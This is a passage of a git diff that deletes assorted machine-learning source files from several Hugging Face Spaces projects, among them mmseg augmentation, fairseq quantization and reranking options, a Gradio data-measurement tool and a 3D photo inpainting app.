- self.weight = nn.Parameter(torch.Tensor(self.n_dims))
- self.eps = eps
- self.scale = scale
-
- def forward(self, x):
- """Forward function."""
- # normalization layer convert to FP32 in FP16 training
- x_float = x.float()
- norm = x_float.pow(2).sum(1, keepdim=True).sqrt() + self.eps
- return (self.weight[None, :, None, None].float().expand_as(x_float) *
- x_float / norm).type_as(x)
diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/datasets/pipelines/test_time_aug.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/datasets/pipelines/test_time_aug.py
deleted file mode 100644
index 473a12bc86b57e564c415ff8bdb1e431425370db..0000000000000000000000000000000000000000
--- a/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/datasets/pipelines/test_time_aug.py
+++ /dev/null
@@ -1,133 +0,0 @@
-import warnings
-
-import mmcv
-
-from ..builder import PIPELINES
-from .compose import Compose
-
-
-@PIPELINES.register_module()
-class MultiScaleFlipAug(object):
- """Test-time augmentation with multiple scales and flipping.
-
- An example configuration is as followed:
-
- .. code-block::
-
- img_scale=(2048, 1024),
- img_ratios=[0.5, 1.0],
- flip=True,
- transforms=[
- dict(type='Resize', keep_ratio=True),
- dict(type='RandomFlip'),
- dict(type='Normalize', **img_norm_cfg),
- dict(type='Pad', size_divisor=32),
- dict(type='ImageToTensor', keys=['img']),
- dict(type='Collect', keys=['img']),
- ]
-
- After MultiScaleFLipAug with above configuration, the results are wrapped
- into lists of the same length as followed:
-
- .. code-block::
-
- dict(
- img=[...],
- img_shape=[...],
- scale=[(1024, 512), (1024, 512), (2048, 1024), (2048, 1024)]
- flip=[False, True, False, True]
- ...
- )
-
- Args:
- transforms (list[dict]): Transforms to apply in each augmentation.
- img_scale (None | tuple | list[tuple]): Images scales for resizing.
- img_ratios (float | list[float]): Image ratios for resizing
- flip (bool): Whether apply flip augmentation. Default: False.
- flip_direction (str | list[str]): Flip augmentation directions,
- options are "horizontal" and "vertical". If flip_direction is list,
- multiple flip augmentations will be applied.
- It has no effect when flip == False. Default: "horizontal".
- """
-
- def __init__(self,
- transforms,
- img_scale,
- img_ratios=None,
- flip=False,
- flip_direction='horizontal'):
- self.transforms = Compose(transforms)
- if img_ratios is not None:
- img_ratios = img_ratios if isinstance(img_ratios,
- list) else [img_ratios]
- assert mmcv.is_list_of(img_ratios, float)
- if img_scale is None:
- # mode 1: given img_scale=None and a range of image ratio
- self.img_scale = None
- assert mmcv.is_list_of(img_ratios, float)
- elif isinstance(img_scale, tuple) and mmcv.is_list_of(
- img_ratios, float):
- assert len(img_scale) == 2
- # mode 2: given a scale and a range of image ratio
- self.img_scale = [(int(img_scale[0] * ratio),
- int(img_scale[1] * ratio))
- for ratio in img_ratios]
- else:
- # mode 3: given multiple scales
- self.img_scale = img_scale if isinstance(img_scale,
- list) else [img_scale]
- assert mmcv.is_list_of(self.img_scale, tuple) or self.img_scale is None
- self.flip = flip
- self.img_ratios = img_ratios
- self.flip_direction = flip_direction if isinstance(
- flip_direction, list) else [flip_direction]
- assert mmcv.is_list_of(self.flip_direction, str)
- if not self.flip and self.flip_direction != ['horizontal']:
- warnings.warn(
- 'flip_direction has no effect when flip is set to False')
- if (self.flip
- and not any([t['type'] == 'RandomFlip' for t in transforms])):
- warnings.warn(
- 'flip has no effect when RandomFlip is not in transforms')
-
- def __call__(self, results):
- """Call function to apply test time augment transforms on results.
-
- Args:
- results (dict): Result dict contains the data to transform.
-
- Returns:
- dict[str: list]: The augmented data, where each value is wrapped
- into a list.
- """
-
- aug_data = []
- if self.img_scale is None and mmcv.is_list_of(self.img_ratios, float):
- h, w = results['img'].shape[:2]
- img_scale = [(int(w * ratio), int(h * ratio))
- for ratio in self.img_ratios]
- else:
- img_scale = self.img_scale
- flip_aug = [False, True] if self.flip else [False]
- for scale in img_scale:
- for flip in flip_aug:
- for direction in self.flip_direction:
- _results = results.copy()
- _results['scale'] = scale
- _results['flip'] = flip
- _results['flip_direction'] = direction
- data = self.transforms(_results)
- aug_data.append(data)
- # list of dict to dict of list
- aug_data_dict = {key: [] for key in aug_data[0]}
- for data in aug_data:
- for key, val in data.items():
- aug_data_dict[key].append(val)
- return aug_data_dict
-
- def __repr__(self):
- repr_str = self.__class__.__name__
- repr_str += f'(transforms={self.transforms}, '
- repr_str += f'img_scale={self.img_scale}, flip={self.flip})'
- repr_str += f'flip_direction={self.flip_direction}'
- return repr_str
diff --git a/spaces/HCMUT-GraduateThesis-HNTThinh/rgbdsod-multimae-demo/webrtc_app.py b/spaces/HCMUT-GraduateThesis-HNTThinh/rgbdsod-multimae-demo/webrtc_app.py
deleted file mode 100644
index 5561aab9a984a1f41230e742aad935b9eab7016c..0000000000000000000000000000000000000000
--- a/spaces/HCMUT-GraduateThesis-HNTThinh/rgbdsod-multimae-demo/webrtc_app.py
+++ /dev/null
@@ -1,57 +0,0 @@
-import threading
-
-import av
-import numpy as np
-import streamlit as st
-from streamlit_webrtc import webrtc_streamer
-
-from app_utils import ImgContainer
-from base_model import BaseRGBDModel
-from color_selection_ui import color_selection_ui
-from depth_model import BaseDepthModel
-from depth_selection_ui import depth_selection_ui
-from model import base_inference
-from sod_selection_ui import sod_selection_ui
-
-lock = threading.Lock()
-
-rtc_configuration = {
- "iceServers": [{"urls": [
- "stun:stun1.l.google.com:19302",
- "stun:stun2.l.google.com:19302",
- "stun:stun3.l.google.com:19302",
- "stun:stun4.l.google.com:19302",
- ]}],
-}
-
-img_container = ImgContainer()
-img_container.frame_rate.reset()
-
-def webrtc_app(
- depth_model: BaseDepthModel,
- sod_model: BaseRGBDModel,
- color: np.ndarray
-):
- def video_frame_callback(frame: av.VideoFrame) -> av.VideoFrame:
- img: np.ndarray = frame.to_ndarray(format="bgr24")
- with lock:
- img_container.img = img
- img_container.frame_rate.count()
- img = img_container.frame_rate.show_fps(img)
- _, pred_sod, _ = base_inference(
- depth_model, sod_model, img, None, color
- )
- return av.VideoFrame.from_ndarray(pred_sod, format="bgr24")
-
-
- st.session_state.ctx = webrtc_streamer(
- key="snapshot",
- video_frame_callback=video_frame_callback,
- rtc_configuration=rtc_configuration
- )
-
-if __name__ == '__main__':
- depth_model = depth_selection_ui(st)
- sod_model = sod_selection_ui(st)
- color = color_selection_ui(st)
- webrtc_app(depth_model, sod_model, color)
\ No newline at end of file
diff --git a/spaces/HaHaBill/LandShapes-Antarctica/netdissect/upsegmodel/prroi_pool/__init__.py b/spaces/HaHaBill/LandShapes-Antarctica/netdissect/upsegmodel/prroi_pool/__init__.py
deleted file mode 100644
index 0c40b7a7e2bca8a0dbd28e13815f2f2ad6c4728b..0000000000000000000000000000000000000000
--- a/spaces/HaHaBill/LandShapes-Antarctica/netdissect/upsegmodel/prroi_pool/__init__.py
+++ /dev/null
@@ -1,13 +0,0 @@
-#! /usr/bin/env python3
-# -*- coding: utf-8 -*-
-# File : __init__.py
-# Author : Jiayuan Mao, Tete Xiao
-# Email : maojiayuan@gmail.com, jasonhsiao97@gmail.com
-# Date : 07/13/2018
-#
-# This file is part of PreciseRoIPooling.
-# Distributed under terms of the MIT license.
-# Copyright (c) 2017 Megvii Technology Limited.
-
-from .prroi_pool import *
-
diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/modules/kmeans_vector_quantizer.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/modules/kmeans_vector_quantizer.py
deleted file mode 100644
index 040db1e83e775a3bb59d5263d22aae9276a83f22..0000000000000000000000000000000000000000
--- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/fairseq/modules/kmeans_vector_quantizer.py
+++ /dev/null
@@ -1,127 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-import torch
-import torch.nn as nn
-from fairseq.modules import Fp32GroupNorm
-
-
-class KmeansVectorQuantizer(nn.Module):
- def __init__(
- self, dim, num_vars, groups, combine_groups, vq_dim, time_first, gamma=0.25
- ):
- """Vector quantization using straight pass-through estimator (i.e. kmeans)
-
- Args:
- dim: input dimension (channels)
- num_vars: number of quantized vectors per group
- groups: number of groups for vector quantization
- combine_groups: whether to use the vectors for all groups
- vq_dim: dimensionality of the resulting quantized vector
- time_first: if true, expect input in BxTxC format, otherwise in BxCxT
- gamma: commitment loss coefficient
- """
- super().__init__()
-
- self.groups = groups
- self.combine_groups = combine_groups
- self.input_dim = dim
- self.num_vars = num_vars
- self.vq_dim = vq_dim
- self.time_first = time_first
-
- assert (
- vq_dim % groups == 0
- ), f"dim {vq_dim} must be divisible by groups {groups} for concatenation"
-
- self.var_dim = vq_dim // groups
- num_groups = groups if not combine_groups else 1
-
- self.embedding = nn.Parameter(
- 0.01 * torch.randn(num_vars, num_groups, self.var_dim)
- )
- self.projection = nn.Sequential(
- nn.Conv1d(dim, dim, kernel_size=1, groups=groups, bias=False),
- Fp32GroupNorm(groups, dim),
- )
- self.gamma = gamma
- self.mse_mean = nn.MSELoss(reduction="mean")
-
- def _pass_grad(self, x, y):
- """Manually set gradient for backward pass.
- for y = f(x), ensure that during the backward pass,
- dL/dy = dL/dx regardless of f(x).
- Returns:
- y, with the gradient forced to be dL/dy = dL/dx.
- """
-
- return y.detach() + (x - x.detach())
-
- @property
- def expand_embedding(self):
- if self.combine_groups:
- return self.embedding.expand(self.num_vars, self.groups, self.var_dim)
- return self.embedding
-
- def forward_idx(self, x):
- res = self.forward(x, produce_targets=True)
- return res["x"], res["targets"]
-
- def forward(self, x, produce_targets=False):
-
- result = {"num_vars": self.num_vars}
-
- if self.time_first:
- x = x.transpose(1, 2)
-
- bsz, fsz, tsz = x.shape
-
- ze = self.projection(x)
- ze_ = ze.view(bsz, self.groups, self.var_dim, tsz).permute(0, 3, 1, 2)
- d = (
- (ze_.unsqueeze(0) - self.expand_embedding.unsqueeze(1).unsqueeze(1))
- .view(self.num_vars, bsz, tsz, self.groups, -1)
- .norm(dim=-1, p=2)
- )
- idx = d.argmin(dim=0)
- zq = (
- torch.stack(
- [
- self.expand_embedding[idx[..., group], group]
- for group in range(self.groups)
- ],
- dim=-2,
- )
- .view(bsz, tsz, self.groups * self.var_dim)
- .permute(0, 2, 1)
- )
- assert ze.shape == zq.shape, (ze.shape, zq.shape)
- x = self._pass_grad(ze, zq)
-
- hard_x = (
- idx.new_zeros(bsz * tsz * self.groups, self.num_vars)
- .scatter_(-1, idx.view(-1, 1), 1.0)
- .view(bsz * tsz, self.groups, -1)
- )
- hard_probs = torch.mean(hard_x.float(), dim=0)
- result["code_perplexity"] = torch.exp(
- -torch.sum(hard_probs * torch.log(hard_probs + 1e-7), dim=-1)
- ).sum()
-
- if produce_targets:
- result["targets"] = idx
-
- if self.time_first:
- x = x.transpose(1, 2) # BCT -> BTC
- result["x"] = x
-
- ze = ze.float()
- zq = zq.float()
- latent_loss = self.mse_mean(zq, ze.detach())
- commitment_loss = self.mse_mean(ze, zq.detach())
-
- result["kmeans_loss"] = latent_loss + self.gamma * commitment_loss
-
- return result
diff --git a/spaces/HarshulNanda/HARM_ML_App_ludwig/eduContentPredictor.py b/spaces/HarshulNanda/HARM_ML_App_ludwig/eduContentPredictor.py
deleted file mode 100644
index 67deda3300672cfb4777618d4e705488bf80059c..0000000000000000000000000000000000000000
--- a/spaces/HarshulNanda/HARM_ML_App_ludwig/eduContentPredictor.py
+++ /dev/null
@@ -1,31 +0,0 @@
-from youtubesearchpython import Transcript, Video, ResultMode
-import pickle
-from stqdm import stqdm
-import pandas as pd
-
-def eduContentPrediction(url):
- segments = Transcript.get(url)["segments"]
- E = 0
- NonE = 0
- # education_model = pickle.load(open("./models/educated_model.pkl", "rb"))
-
- education_classifier = pickle.load(open("./models/ludwig_edu.pkl", "rb"))
-
- timer = stqdm(segments)
-
- for segment in timer:
- timer.set_description("☕️ Have a coffee, while we apply our model on the video transcript. ")
- text_to_predict = pd.DataFrame({
- "text": [
- str(segment["text"]),
- ]
- })
- edu_pred, _ = education_classifier.predict(text_to_predict)
- text_prediction = list(edu_pred.category_predictions)[0]
- # text_prediction = education_model.predict(text)[0]
- if text_prediction == "Education":
- E += 1
- else:
- NonE += 1
-
- return "The {:.2f}% portion of this video is educational.".format(E*100/(E+NonE))
\ No newline at end of file
diff --git a/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/scripts/train_glow.sh b/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/scripts/train_glow.sh
deleted file mode 100644
index 3b563f17b0ec66ac2f7e3c35f973f7890f02570c..0000000000000000000000000000000000000000
--- a/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/scripts/train_glow.sh
+++ /dev/null
@@ -1,12 +0,0 @@
-#!/bin/bash
-
-config=''
-modeldir=''
-logdir=''
-init=1 # 1, start from scratch - 0, start from last checkpoint
-
-if [[ $init -eq 1 ]]
-then
- python ../src/glow_tts/init.py -c $config -m $modeldir -l $logdir
-fi
-python ../src/glow_tts/train.py -c $config -m $modeldir -l $logdir
diff --git a/spaces/Harveenchadha/en_to_indic_translation/indic_nlp_library/indicnlp/syllable/__init__.py b/spaces/Harveenchadha/en_to_indic_translation/indic_nlp_library/indicnlp/syllable/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/HuangLab/CELL-E_2-Image_Prediction/README.md b/spaces/HuangLab/CELL-E_2-Image_Prediction/README.md
deleted file mode 100644
index e51ef2ec43883636a865622fd2019475de4fed5a..0000000000000000000000000000000000000000
--- a/spaces/HuangLab/CELL-E_2-Image_Prediction/README.md
+++ /dev/null
@@ -1,16 +0,0 @@
----
-title: CELL-E 2 - Image Prediction
-emoji: 🔬
-colorFrom: red
-colorTo: purple
-sdk: gradio
-python_version: 3.11.5
-sdk_version: 3.45.2
-app_file: app.py
-tags: [proteins, text-to-image]
-fullWidth: true
-pinned: true
-license: mit
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/HuggingFaceM4/IDEFICS_Data_Measurement_Tool/app.py b/spaces/HuggingFaceM4/IDEFICS_Data_Measurement_Tool/app.py
deleted file mode 100644
index 7cf0ae5e8fc8ab57d73c3d3956c084e3fec37450..0000000000000000000000000000000000000000
--- a/spaces/HuggingFaceM4/IDEFICS_Data_Measurement_Tool/app.py
+++ /dev/null
@@ -1,265 +0,0 @@
-# Copyright 2021 The HuggingFace Team. All rights reserved.
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-import argparse
-import ast
-import gradio as gr
-from os.path import isdir
-from data_measurements.dataset_statistics import DatasetStatisticsCacheClass as dmt_cls
-import utils
-from utils import dataset_utils
-from utils import gradio_utils as gr_utils
-import widgets
-
-logs = utils.prepare_logging(__file__)
-
-# Utility for sidebar description and selection of the dataset
-DATASET_NAME_TO_DICT = dataset_utils.get_dataset_info_dicts()
-
-
-def get_load_prepare_list(dstats):
- """
- # Get load_or_prepare functions for the measurements we will display
- """
- # Measurement calculation:
- # Add any additional modules and their load-prepare function here.
- load_prepare_list = [("general stats", dstats.load_or_prepare_general_stats),
- ("label distribution", dstats.load_or_prepare_labels),
- ("text_lengths", dstats.load_or_prepare_text_lengths),
- ("duplicates", dstats.load_or_prepare_text_duplicates),
- ("npmi", dstats.load_or_prepare_npmi),
- ("zipf", dstats.load_or_prepare_zipf)]
-
- return load_prepare_list
-
-
-def get_ui_widgets():
- """Get the widgets that will be displayed in the UI."""
- return [widgets.DatasetDescription(DATASET_NAME_TO_DICT),
- widgets.GeneralStats(),
- widgets.LabelDistribution(),
- widgets.TextLengths(),
- widgets.Duplicates(),
- widgets.Npmi(),
- widgets.Zipf()]
-
-
-def get_widgets():
- """
- # A measurement widget requires 2 things:
- # - A load or prepare function
- # - A display function
- # We define these in two separate functions get_load_prepare_list and get_ui_widgets;
- # any widget can be added by modifying both functions and the rest of the app logic will work.
- # get_load_prepare_list is a function since it requires a DatasetStatisticsCacheClass which will
- # not be created until dataset and config values are selected in the ui
- """
- return get_load_prepare_list, get_ui_widgets()
-
-
-def get_title(dstats):
- title_str = f"### Showing: {dstats.dset_name} - {dstats.dset_config} - {dstats.split_name} - {'-'.join(dstats.text_field)}"
- logs.info("showing header")
- return title_str
-
-
-def display_initial_UI():
- """Displays the header in the UI"""
- # Extract the selected arguments
- dataset_args = gr_utils.sidebar_selection(DATASET_NAME_TO_DICT)
- return dataset_args
-
-
-def load_or_prepare_widgets(dstats, load_prepare_list, show_perplexities, live=True, pull_cache_from_hub=False):
- """
- Takes the dataset arguments from the GUI and uses them to load a dataset from the Hub or, if
- a cache for those arguments is available, to load it from the cache.
- Widget data is loaded only when the system is live (deployed for users).
- Otherwise, the data is prepared if it doesn't yet exist.
- Args:
- ds_args (dict): the dataset arguments defined via the streamlit app GUI
- load_prepare_list (list): List of (widget_name, widget_load_or_prepare_function)
- show_perplexities (Bool): whether perplexities should be loaded and displayed for this dataset
- live (Bool): Whether the system is deployed for live use by users.
- pull_cache_from_hub (Bool): Whether the cache should be pulled from the hub (vs locally)
- Returns:
- dstats: the computed dataset statistics (from the dataset_statistics class)
- """
-
- # When we're "live" (tool is being used by users on our servers),
- # cache is used and the f'ns are instructed to only try to load cache,
- # not to prepare/compute anything anew.
- if live:
- # Only use what's cached; don't prepare anything
- load_only = True
- logs.info("Only using cache.")
- else:
- # Prepare things anew and cache them if we're not live.
- load_only = False
- logs.info("Making new calculations if cache is not there.")
- if pull_cache_from_hub:
- dataset_utils.pull_cache_from_hub(dstats.cache_path, dstats.dataset_cache_dir)
-
- # Data common across DMT:
- # Includes the dataset text/requested feature column,
- # the dataset tokenized, and the vocabulary
- dstats.load_or_prepare_text_dataset(load_only=load_only)
- # Just a snippet of the dataset
- dstats.load_or_prepare_dset_peek(load_only=load_only)
- # Tokenized dataset
- dstats.load_or_prepare_tokenized_df(load_only=load_only)
- # Vocabulary (uses tokenized dataset)
- dstats.load_or_prepare_vocab(load_only=load_only)
- # Custom widgets
- for widget_tuple in load_prepare_list:
- widget_name = widget_tuple[0]
- widget_fn = widget_tuple[1]
- try:
- widget_fn(load_only=load_only)
- except Exception as e:
- logs.warning("Issue with %s." % widget_name)
- logs.exception(e)
- # TODO: If these are cached, can't we just show them by default?
- # It won't take up computation time.
- if show_perplexities:
- try:
- dstats.load_or_prepare_text_perplexities(load_only=load_only)
- except Exception as e:
- logs.warning("Issue with %s." % "perplexities")
- logs.exception(e)
- return dstats
-
-
-def show_column(dstats, display_list, show_perplexities, column_id=""):
- """
- Function for displaying the elements in the streamlit app.
- Args:
- dstats (class): The dataset_statistics.py DatasetStatisticsCacheClass
- display_list (list): List of tuples for (widget_name, widget_display_function)
- show_perplexities (Bool): Whether perplexities should be loaded and displayed for this dataset
- column_id (str): Which column of the dataset the analysis is done on [DEPRECATED for v1]
- """
-
- # start showing stuff
- gr_utils.expander_header(dstats, DATASET_NAME_TO_DICT)
- for widget_tuple in display_list:
- widget_type = widget_tuple[0]
- widget_fn = widget_tuple[1]
- logs.info("showing %s." % widget_type)
- try:
- widget_fn(dstats, column_id)
- except Exception as e:
- logs.warning("Jk jk jk. There was an issue with %s:" % widget_type)
- logs.exception(e)
- # TODO: Fix how this is a weird outlier.
- if show_perplexities:
- gr_utils.expander_text_perplexities(dstats, column_id)
- logs.info("Have finished displaying the widgets.")
-
-
-def create_demo(live: bool, pull_cache_from_hub: bool):
- with gr.Blocks() as demo:
- state = gr.State()
- with gr.Row():
- with gr.Column(scale=1):
- dataset_args = display_initial_UI()
- get_load_prepare_list_fn, widget_list = get_widgets()
- # # TODO: Make this less of a weird outlier.
- # Doesn't do anything right now
- show_perplexities = gr.Checkbox(label="Show text perplexities")
- with gr.Column(scale=4):
- gr.Markdown("# Data Measurements Tool")
- title = gr.Markdown()
- for widget in widget_list:
- widget.render()
-
- def update_ui(dataset: str, config: str, split: str, feature: str):
- feature = ast.literal_eval(feature)
- label_field, label_names = gr_utils.get_label_names(dataset, config, DATASET_NAME_TO_DICT)
- dstats = dmt_cls(dset_name=dataset, dset_config=config, split_name=split, text_field=feature,
- label_field=label_field, label_names=label_names, use_cache=True)
- load_prepare_list = get_load_prepare_list_fn(dstats)
- dstats = load_or_prepare_widgets(dstats, load_prepare_list, show_perplexities=False,
- live=live, pull_cache_from_hub=pull_cache_from_hub)
- output = {title: get_title(dstats), state: dstats}
- for widget in widget_list:
- output.update(widget.update(dstats))
- return output
-
- def update_dataset(dataset: str):
- new_values = gr_utils.update_dataset(dataset, DATASET_NAME_TO_DICT)
- config = new_values[0][1]
- feature = new_values[1][1]
- split = new_values[2][1]
- new_dropdown = {
- dataset_args["dset_config"]: gr.Dropdown.update(choices=new_values[0][0], value=config),
- dataset_args["text_field"]: gr.Dropdown.update(choices=new_values[1][0], value=feature),
- dataset_args["split_name"]: gr.Dropdown.update(choices=new_values[2][0], value=split),
- }
- return new_dropdown
-
- def update_config(dataset: str, config: str):
- new_values = gr_utils.update_config(dataset, config, DATASET_NAME_TO_DICT)
-
- feature = new_values[0][1]
- split = new_values[1][1]
- new_dropdown = {
- dataset_args["text_field"]: gr.Dropdown.update(choices=new_values[0][0], value=feature),
- dataset_args["split_name"]: gr.Dropdown.update(choices=new_values[1][0], value=split)
- }
- return new_dropdown
-
- measurements = [comp for output in widget_list for comp in output.output_components]
- demo.load(update_ui,
- inputs=[dataset_args["dset_name"], dataset_args["dset_config"], dataset_args["split_name"], dataset_args["text_field"]],
- outputs=[title, state] + measurements)
-
- for widget in widget_list:
- widget.add_events(state)
- #dataset_args["text_field"] --> the text that could be returned
- dataset_args["dset_name"].change(update_dataset,
- inputs=[dataset_args["dset_name"]],
- outputs=[dataset_args["dset_config"],
- dataset_args["split_name"], dataset_args["text_field"],
- title, state] + measurements)
-
- dataset_args["dset_config"].change(update_config,
- inputs=[dataset_args["dset_name"], dataset_args["dset_config"]],
- outputs=[dataset_args["split_name"], dataset_args["text_field"],
- title, state] + measurements)
-
- dataset_args["calculate_btn"].click(update_ui,
- inputs=[dataset_args["dset_name"], dataset_args["dset_config"],
- dataset_args["split_name"], dataset_args["text_field"]],
- outputs=[title, state] + measurements)
- return demo
-
-
-def main():
- parser = argparse.ArgumentParser()
- parser.add_argument(
- "--live", default=False, required=False, action="store_true", help="Flag to specify that this is not running live.")
- parser.add_argument(
- "--pull_cache_from_hub", default=False, required=False, action="store_true", help="Flag to specify whether to look in the hub for measurements caches. If you are using this option, you must have HUB_CACHE_ORGANIZATION= and HF_TOKEN= on separate lines in a file named .env at the root of this repo.")
- arguments = parser.parse_args()
- live = arguments.live
- pull_cache_from_hub = arguments.pull_cache_from_hub
-
- # Create and initialize the demo
- demo = create_demo(live, pull_cache_from_hub)
-
- demo.launch()
-
-if __name__ == "__main__":
- main()
diff --git a/spaces/ICML2022/OFA/fairseq/examples/noisychannel/rerank_options.py b/spaces/ICML2022/OFA/fairseq/examples/noisychannel/rerank_options.py
deleted file mode 100644
index de91939e6635bdf33c9dc330116be07d9e8be6a2..0000000000000000000000000000000000000000
--- a/spaces/ICML2022/OFA/fairseq/examples/noisychannel/rerank_options.py
+++ /dev/null
@@ -1,149 +0,0 @@
-# Copyright (c) Facebook, Inc. and its affiliates.
-#
-# This source code is licensed under the MIT license found in the
-# LICENSE file in the root directory of this source tree.
-
-from fairseq import options
-
-
-def get_reranking_parser(default_task="translation"):
- parser = options.get_parser("Generation and reranking", default_task)
- add_reranking_args(parser)
- return parser
-
-
-def get_tuning_parser(default_task="translation"):
- parser = options.get_parser("Reranking tuning", default_task)
- add_reranking_args(parser)
- add_tuning_args(parser)
- return parser
-
-
-def add_reranking_args(parser):
- group = parser.add_argument_group("Reranking")
- # fmt: off
- group.add_argument('--score-model1', '-s1', type=str, metavar='FILE', required=True,
- help='path to first model or ensemble of models for rescoring')
- group.add_argument('--score-model2', '-s2', type=str, metavar='FILE', required=False,
- help='path to second model or ensemble of models for rescoring')
- group.add_argument('--num-rescore', '-n', type=int, metavar='N', default=10,
- help='the number of candidate hypothesis to rescore')
- group.add_argument('-bz', '--batch-size', type=int, metavar='N', default=128,
- help='batch size for generating the nbest list')
- group.add_argument('--gen-subset', default='test', metavar='SET', choices=['test', 'train', 'valid'],
- help='data subset to generate (train, valid, test)')
- group.add_argument('--gen-model', default=None, metavar='FILE',
- help='the model to generate translations')
- group.add_argument('-b1', '--backwards1', action='store_true',
- help='whether or not the first model group is backwards')
- group.add_argument('-b2', '--backwards2', action='store_true',
- help='whether or not the second model group is backwards')
- group.add_argument('-a', '--weight1', default=1, nargs='+', type=float,
- help='the weight(s) of the first model')
- group.add_argument('-b', '--weight2', default=1, nargs='+', type=float,
- help='the weight(s) of the second model, or the gen model if using nbest from interactive.py')
- group.add_argument('-c', '--weight3', default=1, nargs='+', type=float,
- help='the weight(s) of the third model')
-
- # lm arguments
- group.add_argument('-lm', '--language-model', default=None, metavar='FILE',
- help='language model for target language to rescore translations')
- group.add_argument('--lm-dict', default=None, metavar='FILE',
- help='the dict of the language model for the target language')
- group.add_argument('--lm-name', default=None,
- help='the name of the language model for the target language')
- group.add_argument('--lm-bpe-code', default=None, metavar='FILE',
- help='the bpe code for the language model for the target language')
- group.add_argument('--data-dir-name', default=None,
- help='name of data directory')
- group.add_argument('--lenpen', default=1, nargs='+', type=float,
- help='length penalty: <1.0 favors shorter, >1.0 favors longer sentences')
- group.add_argument('--score-dict-dir', default=None,
- help='the directory with dictionaries for the scoring models')
- group.add_argument('--right-to-left1', action='store_true',
- help='whether the first model group is a right to left model')
- group.add_argument('--right-to-left2', action='store_true',
- help='whether the second model group is a right to left model')
- group.add_argument('--post-process', '--remove-bpe', default='@@ ',
- help='the bpe symbol, used for the bitext and LM')
- group.add_argument('--prefix-len', default=None, type=int,
- help='the length of the target prefix to use in rescoring (in terms of words wo bpe)')
- group.add_argument('--sampling', action='store_true',
- help='use sampling instead of beam search for generating n best list')
- group.add_argument('--diff-bpe', action='store_true',
- help='bpe for rescoring and nbest list not the same')
- group.add_argument('--rescore-bpe-code', default=None,
- help='bpe code for rescoring models')
- group.add_argument('--nbest-list', default=None,
- help='use predefined nbest list in interactive.py format')
- group.add_argument('--write-hypos', default=None,
- help='filename prefix to write hypos to')
- group.add_argument('--ref-translation', default=None,
- help='reference translation to use with nbest list from interactive.py')
- group.add_argument('--backwards-score-dict-dir', default=None,
- help='the directory with dictionaries for the backwards model,'
- 'if None then it is assumed the fw and backwards models share dictionaries')
-
- # extra scaling args
- group.add_argument('--gen-model-name', default=None,
- help='the name of the models that generated the nbest list')
- group.add_argument('--model1-name', default=None,
- help='the name of the set for model1 group ')
- group.add_argument('--model2-name', default=None,
- help='the name of the set for model2 group')
- group.add_argument('--shard-id', default=0, type=int,
- help='the id of the shard to generate')
- group.add_argument('--num-shards', default=1, type=int,
- help='the number of shards to generate across')
- group.add_argument('--all-shards', action='store_true',
- help='use all shards')
- group.add_argument('--target-prefix-frac', default=None, type=float,
- help='the fraction of the target prefix to use in rescoring (in terms of words wo bpe)')
- group.add_argument('--source-prefix-frac', default=None, type=float,
- help='the fraction of the source prefix to use in rescoring (in terms of words wo bpe)')
- group.add_argument('--normalize', action='store_true',
- help='whether to normalize by src and target len')
- # fmt: on
- return group
-
-
-def add_tuning_args(parser):
- group = parser.add_argument_group("Tuning")
-
- group.add_argument(
- "--lower-bound",
- default=[-0.7],
- nargs="+",
- type=float,
- help="lower bound of search space",
- )
- group.add_argument(
- "--upper-bound",
- default=[3],
- nargs="+",
- type=float,
- help="upper bound of search space",
- )
- group.add_argument(
- "--tune-param",
- default=["lenpen"],
- nargs="+",
- choices=["lenpen", "weight1", "weight2", "weight3"],
- help="the parameter(s) to tune",
- )
- group.add_argument(
- "--tune-subset",
- default="valid",
- choices=["valid", "test", "train"],
- help="the subset to tune on ",
- )
- group.add_argument(
- "--num-trials",
- default=1000,
- type=int,
- help="number of trials to do for random search",
- )
- group.add_argument(
- "--share-weights", action="store_true", help="share weight2 and weight 3"
- )
- return group
diff --git a/spaces/InpaintAI/Inpaint-Anything/third_party/lama/saicinpainting/training/data/__init__.py b/spaces/InpaintAI/Inpaint-Anything/third_party/lama/saicinpainting/training/data/__init__.py
deleted file mode 100644
index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000
diff --git a/spaces/Jacks2003/3D_Photo_Inpainting/app.py b/spaces/Jacks2003/3D_Photo_Inpainting/app.py
deleted file mode 100644
index e2f4ea41bc89a74d79fa974a0f3f066820e3c27f..0000000000000000000000000000000000000000
--- a/spaces/Jacks2003/3D_Photo_Inpainting/app.py
+++ /dev/null
@@ -1,230 +0,0 @@
-# Repo source: https://github.com/vt-vl-lab/3d-photo-inpainting
-
-import os
-#os.environ['QT_DEBUG_PLUGINS'] = '1'
-
-import subprocess
-#subprocess.run('ldd /home/user/.local/lib/python3.8/site-packages/PyQt5/Qt/plugins/platforms/libqxcb.so', shell=True)
-#subprocess.run('pip list', shell=True)
-subprocess.run('nvidia-smi', shell=True)
-os.mkdir("image")
-
-from pyvirtualdisplay import Display
-display = Display(visible=0, size=(1920, 1080)).start()
-#subprocess.run('echo $DISPLAY', shell=True)
-
-# 3d inpainting imports
-import numpy as np
-import argparse
-import glob
-import os
-from functools import partial
-import vispy
-import scipy.misc as misc
-from tqdm import tqdm
-import yaml
-import time
-import sys
